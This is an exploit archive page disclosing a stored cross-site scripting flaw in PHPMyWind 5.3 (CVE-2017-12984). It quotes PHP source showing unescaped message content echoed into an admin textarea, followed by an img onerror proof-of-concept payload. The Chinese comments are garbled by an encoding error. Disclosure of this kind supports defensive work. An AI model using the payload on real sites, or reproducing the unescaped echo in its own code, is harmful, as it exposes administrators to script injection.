what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHPMyWind 5.3 Cross Site Scripting

PHPMyWind 5.3 Cross Site Scripting
Posted Aug 21, 2017

PHPMyWind version 5.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2017-12984
SHA-256 | 65c6635e0b97fc4444668b042ff8d45f59f1ec5c7f068c0920597b354e40013e

PHPMyWind 5.3 Cross Site Scripting

Change Mirror Download
Exploit Titlei1/4PHPMyWind 5.3 has XSS
Exploit Author:adege"
Vendor Homepage:http://phpmywind.com
Software Link:http://phpmywind.com/downloads/PHPMyWind_5.3.zip
Version:5.3
CVE:CVE-2017-12984


$r= $dosql->GetOne("SELECT Max(orderid) AS orderid FROM `#@__message`");
$orderid= (empty($r['orderid']) ? 1 : ($r['orderid'] + 1));
$nickname= htmlspecialchars($nickname);//ae,,a(r)C/(xxx)
$contact= htmlspecialchars($contact); //ec3>>ae1a1/4
$content= htmlspecialchars($content); //ce"aa(r)1

$posttime= GetMkTime(time());
$ip= gethostbyname($_SERVER['REMOTE_ADDR']);


$sql= "INSERT INTO `#@__message` (siteid, nickname, contact, content, orderid, posttime, htop, rtop, checkinfo, ip) VALUES (1, '$nickname', '$contact', '$content', '$orderid', '$posttime', '', '', 'false', '$ip')";
if($dosql->ExecNoneQuery($sql))
{
ShowMsg('ce"aeai1/4aeedegC/ae"cae-aei1/4','message.php');
exit();
}
}
a-a>>Y=caoa1/2?c"htmlspecialcharse?e!e?ae>>$?,a,|aY=aoa,.
e*e?contentaaedega
127.0.0.1/PHPMyWind_5.3/admin/ message_update.php
<?php require_once(dirname(__FILE__).'/inc/config.inc.php');IsModelPriv('message'); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>a?(r)ae1ce"</title>
<link href="templates/style/admin.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="templates/js/jquery.min.js"></script>
<script type="text/javascript" src="templates/js/checkf.func.js"></script>
<script type="text/javascript" src="editor/kindeditor-min.js"></script>
<script type="text/javascript" src="editor/lang/zh_CN.js"></script>
</head>
<body>
<?php
$row = $dosql->GetOne("SELECT * FROM `#@__message` WHERE `id`=$id");
?>
<div class="formHeader"> <span class="title">a?(r)ae1ce"</span> <a href="javascript:location.reload();" class="reload">a*aedeg</a> </div>
<form name="form" id="form" method="post" action="message_save.php">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="formTable">
<tr>
<td width="25%" height="40" align="right">c"ae*ai1/4</td>
<td width="75%"><strong><?php echo $row['nickname'] ?></strong></td>
</tr>
<tr>
<td height="40" align="right">ec3>>ae1a1/4i1/4</td>
<td><input type="text" name="contact" id="contact" class="input" value="<?php echo $row['contact'] ?>" /></td>
</tr>
<tr>
<td height="198" align="right">ce"aa(r)1i1/4</td>
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>
<script>


p:33
<td><textarea name="content" id="content"><?php echo $row['content'] ?></textarea>

aadegc'aeY=aaocontentaaedeg,aedegae(r)a1Paeae?e!e1/2!a1aea1/2a


EXP: a><img/src=x onerror=alert(2001)><aa

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close